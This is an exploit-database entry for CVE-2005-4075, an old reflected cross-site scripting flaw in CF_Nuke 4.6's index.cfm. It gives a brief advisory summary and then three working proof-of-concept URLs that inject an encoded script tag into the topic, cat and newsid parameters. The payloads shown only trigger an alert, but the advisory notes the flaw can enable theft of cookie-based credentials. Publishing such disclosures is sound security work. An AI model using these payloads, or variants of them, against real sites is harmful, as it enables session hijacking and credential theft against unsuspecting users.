CF_Nuke 4.6 - 'index.cfm' Cross-Site Scripting



EKU-ID: 32071 CVE: CVE-2005-4075;OSVDB-21507 OSVDB-ID:
Author: r0t Published: 2005-12-08 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/15778/info

CF_Nuke is prone to multiple cross-site scripting vulnerabilities. These are due to a lack of proper sanitization of user-supplied input.

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site.

These may facilitate the theft of cookie-based authentication credentials as well as other attacks.

http://www.example.com/index.cfm?sector=news&page=topic&topic=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.example.com/index.cfm?sector=links&page=links&cmd=view&cat=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.example.com/index.cfm?sector=news&page=read&newsid=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E